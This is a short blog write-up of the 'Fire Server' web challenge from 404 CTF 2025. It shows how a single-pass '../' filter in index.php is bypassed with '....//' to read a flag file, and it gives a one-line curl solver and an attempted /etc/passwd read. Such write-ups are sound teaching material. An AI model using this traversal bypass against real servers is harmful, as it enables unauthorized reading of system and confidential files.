Post

Fire Server | 404 CTF 2025

Posted
By Debrunbaix
1 min read
Fire Server | 404 CTF 2025

Fire Server

Ressources

URL : https://fire-server.404ctf.fr/ FILE : fire-server.zip

  • doc*.txt
  • Dockerfile
  • index.php

Exploration

When we click to a file, the website write his content on the screen. the request it does is : ?path=doc1.txt.

if we try to read the file ../../../../etc/passwd, we get an error. may be we need to find a way to bypass the restriction.

Code

Dockerfile

1
2
3
4
5

RUN mkdir -p /var/files/classified && \
    echo "Mission Selenium – Niveau 5 Confidentiel\nAnalyse de l’organisme prélevé sur la face cachée lunaire : activité bioélectrique persistante.\nExpérimentations poursuivies malgré les objections éthiques.\n404CTF{fakeflag}" \
    > /var/files/classified/selenium && \
    chmod 640 /var/files/classified/selenium && \
    chown www-data:www-data /var/files/classified/selenium

We can see that the flag is write in /var/files/classified/selenium.

index.php

1

$decodedPath = str_replace("../", "", $decodedPath);

We can see that the ../ are removed from the path. But if we put ....// it becomes ../ so we bypass the restriction.

Now we can get the flag with the following solver : curl -s https://fire-server.404ctf.fr/\?path\=....//....//....//....//var/files/classified/selenium | grep 404CTF{

CTF, Web
CTF Web 404CTF
This post is licensed under CC BY 4.0 by the author.